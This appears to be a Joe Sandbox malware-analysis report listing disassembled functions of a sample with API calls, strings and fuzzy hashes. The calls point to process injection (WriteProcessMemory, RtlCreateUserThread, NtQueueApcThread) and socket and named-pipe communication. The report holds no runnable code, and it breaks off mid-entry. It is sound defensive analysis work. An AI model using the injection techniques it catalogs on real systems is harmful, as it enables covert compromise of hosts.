                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: AccountInformationLookupToken_snprintf
                • String ID: %s\%s
                • API String ID: 2107350476-4073750446
                • Opcode ID: eab80e5e76cae2f62ff1f8dbdd5d2f372e8e47681e9448c49ff6034cb1a03876
                • Instruction ID: a01fbbd93bbb2e6471899dea83562c70fdabe68efe8c54fde2d75722f0e8c38a
                • Opcode Fuzzy Hash: eab80e5e76cae2f62ff1f8dbdd5d2f372e8e47681e9448c49ff6034cb1a03876
                • Instruction Fuzzy Hash: EF215776204FC1D5EB20CFA1E8447DAA764F788B88F488166EA8D5BB18DF39C309C740
                APIs
                • malloc.LIBCMT ref: 038922E6
                  • Part of subcall function 0389D1C8: _FF_MSGBANNER.LIBCMT ref: 0389D1F8
                  • Part of subcall function 0389D1C8: _NMSG_WRITE.LIBCMT ref: 0389D202
                  • Part of subcall function 0389D1C8: HeapAlloc.KERNEL32 ref: 0389D21D
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D236
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D241
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D24C
                • WriteProcessMemory.KERNEL32 ref: 03892354
                • free.LIBCMT ref: 0389236A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno$AllocHeapMemoryProcessWrite_callnewhfreemalloc
                • String ID: @
                • API String ID: 2776329143-2766056989
                • Opcode ID: f16ef9615b18e5dd8738061e84ba1a26569ff2d2e873f0e2120eda13e1fc476a
                • Instruction ID: e55b3a1467bfcc981ae8cc0490b7d55e30a4f967203dfaed073224e2fa7c2418
                • Opcode Fuzzy Hash: f16ef9615b18e5dd8738061e84ba1a26569ff2d2e873f0e2120eda13e1fc476a
                • Instruction Fuzzy Hash: 5F216D36304B4096DA21CF67F84065ABBA8F7C8F80F898566AF9C87B24DF38C146C744
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: RtlCreateUserThread$ntdll.dll
                • API String ID: 1646373207-2935400652
                • Opcode ID: 15f0dc51ca9a3cf6381f817f0897e39ef6e2971f7222ba54e661cb1281496193
                • Instruction ID: f734eaf0f5ccfdc9cf52286e2d843e8f98a82d65c2608b50f910e558fa05fea7
                • Opcode Fuzzy Hash: 15f0dc51ca9a3cf6381f817f0897e39ef6e2971f7222ba54e661cb1281496193
                • Instruction Fuzzy Hash: 84016D72204B85C2DB60CF41F88474AB7A8F798B80F998179EA9D43B14DF38C695C740
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: NtQueueApcThread$ntdll
                • API String ID: 1646373207-1374908105
                • Opcode ID: d30a437afc947ebabf09e6ac1e31674b1d188f910b9a95b468b4020ddae0429a
                • Instruction ID: 96de1e3582812cff33e9b7f916779ec2c39987d2a4d9dd5e46f9c309064e0493
                • Opcode Fuzzy Hash: d30a437afc947ebabf09e6ac1e31674b1d188f910b9a95b468b4020ddae0429a
                • Instruction Fuzzy Hash: 4901A265300B4296EE00DB56F89035AA3A4F789BD0F888966EE5987B18DF38C251C700
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: IsWow64Process$kernel32
                • API String ID: 1646373207-3789238822
                • Opcode ID: 0cc2c14e6aa49fa359cc5a066454d7c9afb306410e03beef033b30a086c723ab
                • Instruction ID: 881906a6601ecaa3e02cd33ded49826564699d2aecc7160bf563437a8a2409fa
                • Opcode Fuzzy Hash: 0cc2c14e6aa49fa359cc5a066454d7c9afb306410e03beef033b30a086c723ab
                • Instruction Fuzzy Hash: 8AE04FA172170283EE46DB95F89436AE364EB89795F486064FA4B46364EF3CC288CB54
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: Wow64DisableWow64FsRedirection$kernel32
                • API String ID: 1646373207-736604160
                • Opcode ID: 5af8d57bb0da597028356cedd416d00d071a52161799d3d393d8390d6dec4b71
                • Instruction ID: 3fc168b525598fc059e58e9ad91b73518be65577847e41754ced035c160c232b
                • Opcode Fuzzy Hash: 5af8d57bb0da597028356cedd416d00d071a52161799d3d393d8390d6dec4b71
                • Instruction Fuzzy Hash: 24D05E9075170782EE069B92B8483AAD328EB8DB41F4C50A5981A06720EF3CC389C754
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: Wow64RevertWow64FsRedirection$kernel32
                • API String ID: 1646373207-3900151262
                • Opcode ID: 36b9989a3d64f40f2418a191821256b55915b9026f8b13fc485a792d70ae28d9
                • Instruction ID: c79faa7d988d628a19cce2f313a6c2465b61903d78335236aeec6cbe7f7bb6c0
                • Opcode Fuzzy Hash: 36b9989a3d64f40f2418a191821256b55915b9026f8b13fc485a792d70ae28d9
                • Instruction Fuzzy Hash: 0FD09E9075170782EE169B92B858766A354AB9DB41F4C50A5981A06360EF2CC399C754
                APIs
                • malloc.LIBCMT ref: 0349C3DA
                  • Part of subcall function 0349C60F: _FF_MSGBANNER.LIBCMT ref: 0349C63F
                  • Part of subcall function 0349C60F: _NMSG_WRITE.LIBCMT ref: 0349C649
                  • Part of subcall function 0349C60F: _callnewh.LIBCMT ref: 0349C67D
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C688
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C693
                • malloc.LIBCMT ref: 0349C3E8
                  • Part of subcall function 0349C60F: _callnewh.LIBCMT ref: 0349C6A3
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C6A8
                • malloc.LIBCMT ref: 0349C40A
                • _snprintf.LIBCMT ref: 0349C425
                  • Part of subcall function 0349C9C3: _errno.LIBCMT ref: 0349C9FA
                  • Part of subcall function 0349C9C3: _invalid_parameter_noinfo.LIBCMT ref: 0349CA05
                • malloc.LIBCMT ref: 0349C440
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
                • String ID:
                • API String ID: 2026495703-0
                • Opcode ID: 517d69768db3b6bf3d395ac3c09d0a903cb9471390505f3454a2c5542d334632
                • Instruction ID: cd9919b96c929027ec6a378e7f313e6a35f8ef1ab272507209d8aaf0420ff664
                • Opcode Fuzzy Hash: 517d69768db3b6bf3d395ac3c09d0a903cb9471390505f3454a2c5542d334632
                • Instruction Fuzzy Hash: 79116D70A1CF084FEBA8EB6DA4852657AD1FB8C310F10455FE08EC7395EA349C4187C6
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno_fileno_flush_getptd_noexit_invalid_parameter_noinfo
                • String ID:
                • API String ID: 634798775-0
                • Opcode ID: b2a8dbbb867a594f76b04f7a59aae2ecf5df5d729cd9875792cf73ff4dabdb8d
                • Instruction ID: b9c0a690743c7f62077ea9926dc09804843c91fc9f81a282df42915d67979f06
                • Opcode Fuzzy Hash: b2a8dbbb867a594f76b04f7a59aae2ecf5df5d729cd9875792cf73ff4dabdb8d
                • Instruction Fuzzy Hash: E541ED30A1CF094FEF2CEE6D94551367AC1E75A210B18026FD49ACB265EAA0DC5386CA
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$MemoryProcessWrite
                • String ID:
                • API String ID: 3937020117-0
                • Opcode ID: 758ccf515d5a04f9bcb79f0e870055d01cc9422dd9159b1358783e9b0281404f
                • Instruction ID: 6601833323eab4daf4b11382d77f3f98f7d58291f2f8a773d9b2e91862943dc2
                • Opcode Fuzzy Hash: 758ccf515d5a04f9bcb79f0e870055d01cc9422dd9159b1358783e9b0281404f
                • Instruction Fuzzy Hash: 82310726701B5596EF25EFB6A45076EA2D0BB88B84F4C44AADE8987724EF3CC205C741
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: clock
                • String ID:
                • API String ID: 3195780754-0
                • Opcode ID: be8aec6b4dea647665e05a79d7238111acf2a2e9d648eaac77e3af4f201da4c7
                • Instruction ID: 02b466235ddab890981aad854e79defe62ca439d24bd675fbe73c7b8b2df6166
                • Opcode Fuzzy Hash: be8aec6b4dea647665e05a79d7238111acf2a2e9d648eaac77e3af4f201da4c7
                • Instruction Fuzzy Hash: E11136B180DB0C1F4768FEDD944263BB7C0FB95250F1D022FE8DACB202E950D84686EA
                APIs
                • _IsNonwritableInCurrentImage.LIBCMT ref: 0349D490
                  • Part of subcall function 034A1847: _FindPESection.LIBCMT ref: 034A1870
                • _initp_misc_cfltcvt_tab.LIBCMT ref: 0349D4A1
                • _initterm_e.LIBCMT ref: 0349D4B4
                • _IsNonwritableInCurrentImage.LIBCMT ref: 0349D4FD
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: CurrentImageNonwritable$FindSection_initp_misc_cfltcvt_tab_initterm_e
                • String ID:
                • API String ID: 1991439119-0
                • Opcode ID: d0aacdeab6c747e7db722564a7347f1053155731eb9de77eec07b84fb13a130c
                • Instruction ID: 760afcab25f38854b591a359171109993979391d90a90c9ab04e717d4d9e62b0
                • Opcode Fuzzy Hash: d0aacdeab6c747e7db722564a7347f1053155731eb9de77eec07b84fb13a130c
                • Instruction Fuzzy Hash: BB118234614E08CEFB16FB69ECD86A6B768F755214F48452B8443CE160EE78AA44C748
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: clock
                • String ID:
                • API String ID: 3195780754-0
                • Opcode ID: be8aec6b4dea647665e05a79d7238111acf2a2e9d648eaac77e3af4f201da4c7
                • Instruction ID: a370d01c3d165741c150c2f46fa3e2bbd1f3ca2cede3f645463c3680dd1eaad1
                • Opcode Fuzzy Hash: be8aec6b4dea647665e05a79d7238111acf2a2e9d648eaac77e3af4f201da4c7
                • Instruction Fuzzy Hash: 7C11082A604B4545A7B1FFEA688052BF6A0F7847D4F1D21A5EE55D7704EE74C483C601
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 038AD4BC
                  • Part of subcall function 0389F454: _getptd.LIBCMT ref: 0389F46A
                  • Part of subcall function 0389F454: __updatetlocinfo.LIBCMT ref: 0389F49F
                  • Part of subcall function 0389F454: __updatetmbcinfo.LIBCMT ref: 0389F4C6
                • _errno.LIBCMT ref: 038AD4C8
                  • Part of subcall function 0389FBCC: _getptd_noexit.LIBCMT ref: 0389FBD0
                • _invalid_parameter_noinfo.LIBCMT ref: 038AD4D3
                • strchr.LIBCMT ref: 038AD4E9
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                • String ID:
                • API String ID: 4151157258-0
                • Opcode ID: 9dcbabed976c9cb14c0e816df6bc5d9f8365d97b9e504a800266228e51b7a280
                • Instruction ID: ce5ff2916be5d483430b44f3af1730f821983d8d0541a47d9ab50106aebbbde4
                • Opcode Fuzzy Hash: 9dcbabed976c9cb14c0e816df6bc5d9f8365d97b9e504a800266228e51b7a280
                • Instruction Fuzzy Hash: D211E963609BE481FB14DA9DE07013DE690F384FDC74C51A6DB96CFE44D968C14ACB11
                APIs
                • accept.WS2_32 ref: 0389CEF5
                • send.WS2_32 ref: 0389CF33
                • send.WS2_32 ref: 0389CF47
                • closesocket.WS2_32 ref: 0389CF58
                  • Part of subcall function 0389D01C: closesocket.WS2_32 ref: 0389D028
                  • Part of subcall function 0389D01C: free.LIBCMT ref: 0389D032
                  • Part of subcall function 0389D01C: free.LIBCMT ref: 0389D03B
                  • Part of subcall function 0389D01C: free.LIBCMT ref: 0389D044
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: free$closesocketsend$accept
                • String ID:
                • API String ID: 47150829-0
                • Opcode ID: 066e2fc8adee108644c0c95b9f8e143474d501460abce45f6e5e6b60318d2000
                • Instruction ID: 9af7e82a6ade31dba51d788f1066db612d7968cd1c577f90e63863f3ff10f027
                • Opcode Fuzzy Hash: 066e2fc8adee108644c0c95b9f8e143474d501460abce45f6e5e6b60318d2000
                • Instruction Fuzzy Hash: 5601216531474182EF64DF76E59173E6321E78DFF4F08A252DE664BB48CF29C0819741
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: CountTick$NamedPeekPipeSleep
                • String ID:
                • API String ID: 1593283408-0
                • Opcode ID: 0d8f67eb847476cbf5cd18602dcd1106d203af1aa70024b801e6f9b985edf0b0
                • Instruction ID: 4804125d1027751dd4164832533f9a32b6e8bed1c1a3c452522b1ec4983bbc52
                • Opcode Fuzzy Hash: 0d8f67eb847476cbf5cd18602dcd1106d203af1aa70024b801e6f9b985edf0b0
                • Instruction Fuzzy Hash: 47F08C26614A5182FB11CB65F84430BE3A9E788B89F6C8165EA8D82A64DF78C5968B04
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: CountTick$NamedPeekPipeSleep
                • String ID:
                • API String ID: 1593283408-0
                • Opcode ID: 6eb8226b971c676c39cd0dac2a4860ce413c34c9835dff083589f7d44e328186
                • Instruction ID: 685ef8509b8d6839d94f1f47388d40f5630860486158c1ce738227b0ec4a9139
                • Opcode Fuzzy Hash: 6eb8226b971c676c39cd0dac2a4860ce413c34c9835dff083589f7d44e328186
                • Instruction Fuzzy Hash: D7F0D136614B5183F7118BA4F44430BF374F7C8B85F288160EB8886A68DF78C5858B04
                APIs
                • InitializeProcThreadAttributeList.KERNEL32 ref: 03895D96
                • GetProcessHeap.KERNEL32 ref: 03895D9C
                • HeapAlloc.KERNEL32 ref: 03895DAC
                • InitializeProcThreadAttributeList.KERNEL32 ref: 03895DC7
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: AttributeHeapInitializeListProcThread$AllocProcess
                • String ID:
                • API String ID: 1212816094-0
                • Opcode ID: 22c9adbd14fdaacc8fb1e282febc10ff812bb060a347c24def4cc05294e67cba
                • Instruction ID: cef21bfbe5308cebae7711e15ecd00e606bdfbd87e05ab3841b1036397a88d74
                • Opcode Fuzzy Hash: 22c9adbd14fdaacc8fb1e282febc10ff812bb060a347c24def4cc05294e67cba
                • Instruction Fuzzy Hash: 34F0966272478982EB9ACB65B45475BA295EB89B80F6C9476BE4B82B18DF3CC144C700
                APIs
                • closesocket.WS2_32 ref: 0389D028
                • free.LIBCMT ref: 0389D032
                  • Part of subcall function 0389D188: HeapFree.KERNEL32 ref: 0389D19E
                  • Part of subcall function 0389D188: _errno.LIBCMT ref: 0389D1A8
                  • Part of subcall function 0389D188: GetLastError.KERNEL32 ref: 0389D1B0
                • free.LIBCMT ref: 0389D03B
                • free.LIBCMT ref: 0389D044
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: free$ErrorFreeHeapLast_errnoclosesocket
                • String ID:
                • API String ID: 1525665891-0
                • Opcode ID: f0a14ae54f92ead1c4b4b34f15b7183d60d2bbec5c8dcb145cd9b656117da10e
                • Instruction ID: c7ac6507ee1476634b152136f24b9b041b5814cb78198a05ab89e3d010d10ac5
                • Opcode Fuzzy Hash: f0a14ae54f92ead1c4b4b34f15b7183d60d2bbec5c8dcb145cd9b656117da10e
                • Instruction Fuzzy Hash: BBD06757A1060591EF14EBB6E8A113C9320E799F98B5880638E5E9B264CE24C89A8385
                Strings
                • Unknown pseudo relocation bit size %d., xrefs: 00402294
                • Unknown pseudo relocation protocol version %d., xrefs: 004022A8
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID:
                • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                • API String ID: 0-395989641
                • Opcode ID: 8caf0c066df89f6cee4c07a50155e792156557ee52966e310dcb16b3cca200fb
                • Instruction ID: 42e0c3400c77c9dd47adb4fdb8995eb2357067ceb312bbd9be83e7c2f840df7f
                • Opcode Fuzzy Hash: 8caf0c066df89f6cee4c07a50155e792156557ee52966e310dcb16b3cca200fb
                • Instruction Fuzzy Hash: 6A712272B10B9486DF10CF61DA0875A7761FB58BA8F58862ADF08377E8DB7DC540CA08
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: malloc$_errno_getptdfree
                • String ID:
                • API String ID: 3172138858-0
                • Opcode ID: 4061ae52bcfc7ad85d2a69f0cdb15219ba76c7abfce3d0773e5d20170cf697d4
                • Instruction ID: 65c2cc2734a0f1e1ab932c97296fdd95bf2e4b2d1af03b673d3a90e4cb7e88f2
                • Opcode Fuzzy Hash: 4061ae52bcfc7ad85d2a69f0cdb15219ba76c7abfce3d0773e5d20170cf697d4
                • Instruction Fuzzy Hash: 03B1E630625F488FFB1AEF28EC916767BE9F749310B44426FD456CB260EB789442CB85
                APIs
                Strings
                • Address %p has no image-section, xrefs: 00401DC0, 00401FA5
                • VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID: QueryVirtual
                • String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                • API String ID: 1804819252-157664173
                • Opcode ID: 24b42db9420a0036ba5551ca2cf6389df1f73159e8ba1386f4a30517d06c5471
                • Instruction ID: 52aafb0f448170306d42bca5540912cc2139dda9d14def77d71a33c16101a6f6
                • Opcode Fuzzy Hash: 24b42db9420a0036ba5551ca2cf6389df1f73159e8ba1386f4a30517d06c5471
                • Instruction Fuzzy Hash: 4B31E3B3702A4195EF118F12EA4175A3761BB95BA4F49413AEF4C273A1EF3CD486C788
                APIs
                • _errno.LIBCMT ref: 0349CC38
                  • Part of subcall function 0349F013: _getptd_noexit.LIBCMT ref: 0349F017
                • _invalid_parameter_noinfo.LIBCMT ref: 0349CC43
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                • String ID: B
                • API String ID: 1812809483-1255198513
                • Opcode ID: 2c72a65e8919c74c162f480cc61078f9dda1c8fd597633d86c76d95db5f8aa2c
                • Instruction ID: 21cdd0647b6d0726a0b76ae778cebbfbe67972d8707e1c22cb624d70310c8c3e
